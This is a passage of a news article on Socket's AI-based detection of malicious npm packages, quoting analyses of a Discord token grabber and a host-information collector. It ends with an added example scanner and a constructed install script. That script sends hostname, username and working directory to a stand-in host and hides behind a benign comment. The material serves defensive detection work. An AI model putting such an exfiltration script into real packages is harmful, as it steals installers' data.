We were asked not to share several examples as they have yet to be removed, but here's one that has already been dealt with.

mathjs-min

"Socket reported this to npm and it has been removed," said Aboukhadijeh.

AI analysis: "The script contains a discord token grabber function which is a serious security risk. It steals user tokens and sends them to an external server."

"There are some interesting effects as well, such as things that a human might be persuaded of but the AI is marking as a risk," Aboukhadijeh added. "These decisions are somewhat subjective, but the AI is not dissuaded by comments claiming that a dangerous piece of code is not malicious in nature. The AI even includes a humorous comment indicating that it doesn't trust the inline comment."

AI analysis: "The script collects information like hostname, username, home directory, and current working directory and sends it to a remote server. While the author claims it is for bug bounty purposes, this behavior can still pose a privacy risk. The script also contains a blocking operation that can cause performance issues or unresponsiveness."

Aboukhadijeh explained that the software packages at these registries are vast and it's difficult to craft rules that thoroughly plumb the nuances of every file, script, and bit of configuration data.
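To make the two judgments quoted above concrete, here is an added example (not Socket's code, and far simpler than an AI-based analysis): a heuristic scanner for npm install scripts that strips comments before matching, so a reassuring inline comment cannot talk it out of a finding, and that flags host/user fingerprinting combined with network egress, plus blocking synchronous calls. The rule set and the sample script are constructed for illustration.

```javascript
// Added example, not Socket's code. Signals are hypothetical regex rules that
// stand in for the richer analysis described in the article.
const RULES = {
  // host/user information the article lists: hostname, username, home dir, cwd
  fingerprint: /\bos\.(hostname|userInfo|homedir)\s*\(|\bprocess\.cwd\s*\(|\bprocess\.env\.(USER|USERNAME|HOME)\b/,
  // outbound network calls that could carry that information off the machine
  egress: /\b(https?|net|dgram)\.(request|get|createConnection|connect|createSocket)\s*\(|\bfetch\s*\(/,
  // synchronous calls that block the event loop ("blocking operation")
  blocking: /\b(execSync|spawnSync|readFileSync|writeFileSync|Atomics\.wait)\s*\(/,
};

// Remove /* */ and // comments so claims made in them never influence the verdict.
// Naive on purpose: comment markers inside string literals are not handled.
function stripComments(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, '').replace(/\/\/[^\n]*/g, '');
}

// Returns which signals fired and the human-readable findings derived from them.
function analyze(src) {
  const code = stripComments(src);
  const hits = Object.fromEntries(
    Object.entries(RULES).map(([name, re]) => [name, re.test(code)])
  );
  const findings = [];
  if (hits.fingerprint && hits.egress) {
    findings.push('collects host/user information and sends it to a remote server');
  }
  if (hits.blocking) {
    findings.push('contains a blocking operation that can make the process unresponsive');
  }
  return { hits, findings, risk: findings.length > 0 };
}

// Constructed sample: an install script whose comment insists it is harmless.
const SAMPLE = `
// harmless telemetry for a bug bounty program, nothing to see here
const os = require('os');
const https = require('https');
const payload = JSON.stringify({ h: os.hostname(), u: os.userInfo().username, d: process.cwd() });
https.request({ host: 'collector.example', method: 'POST' }).end(payload);
require('child_process').execSync('sleep 5');
`;

console.log(analyze(SAMPLE)); // risk: true, two findings, despite the comment
```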